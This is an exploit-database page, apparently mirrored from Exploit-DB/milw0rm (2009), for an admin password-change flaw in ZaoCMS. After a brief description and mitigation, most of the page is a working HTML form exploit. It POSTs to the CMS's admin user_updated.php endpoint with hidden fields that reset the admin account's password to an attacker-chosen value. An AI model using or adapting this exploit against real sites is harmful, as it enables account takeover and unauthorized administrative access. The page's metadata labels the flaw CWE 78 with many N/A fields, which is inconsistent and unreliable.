header-logo
Suggest Exploit
vendor:
ZaoCMS
by:
ThE g0bL!N
9,3
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: ZaoCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Cod[3] By ThE g0bL!N ZaoCMS Remote Change Password

This exploit allows an attacker to change the password of the admin user in ZaoCMS. The attacker can send a POST request to the user_updated.php page with the username and password parameters set to the desired values. This will allow the attacker to gain access to the admin panel of the CMS.

Mitigation:

Upgrade to the latest version of ZaoCMS and ensure that all user passwords are secure.
Source

Exploit-DB raw data:

<form
action="http://demo.zaocms.com/admin/modules/Users/user_updated.php"
method="post" onsubmit="return checkForm(this);" id=form1 Name=form1>
  <h2>Cod[3] By ThE g0bL!N ZaoCMS Remote Change Password
 </h2>
<tittle> ThE g0bL!N</tittle>
   
  <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  <tr><td width="350">
<input type="hidden" name="user_id" value="1" />
  <table cellSpacing="0" cellPadding="0" width="350" class="form_table2"
border="0">
  <tr><td colspan="2" class="grey_bg">
<h4><strong>Contact/Login Info</strong></h4>
  </td></tr><tr><td width="100"
height="20"><strong>Username*</strong></td><td width="100" height="20">
<strong>admin</strong><input name="username" type="hidden"  value="admin"
/>
  </td></tr><tr><td width="100"
height="20"><strong>Password*</strong></td><td width="100" height="20">
<input name="password" type="text" id="password" value="za0" size="20" />
  </td></tr><tr><td width="100" height="20"><strong>Real
Name*</strong></td><td width="100" height="20">
<input name="realname" type="text" value="ZaoCMS Demo Admin" size="20">
  </td></tr>
<tr><td width="100" height="20"><strong>Email</strong><br />
  &nbsp; </td><td width="100" height="20">
    <input name="email" type="text" id="email" value="test@test.com" size="20"
/>
  </td></tr><tr><td width="100" height="20"><strong>Phone</strong></td><td
width="100" height="20">
<p>
 <input type="checkbox" checked="checked" name="is_admin" value="y"
disabled /> Site Administrator Priveleges <p>    
    &nbsp;
  <input type="hidden" name="redir" value="" />
    <input type="submit" value="Save Changes" id="submit" name="submit" 
class="s" />
  </p></td></tr> 

# milw0rm.com [2009-05-22]

Navigation

Suggest Exploit

Services By CQR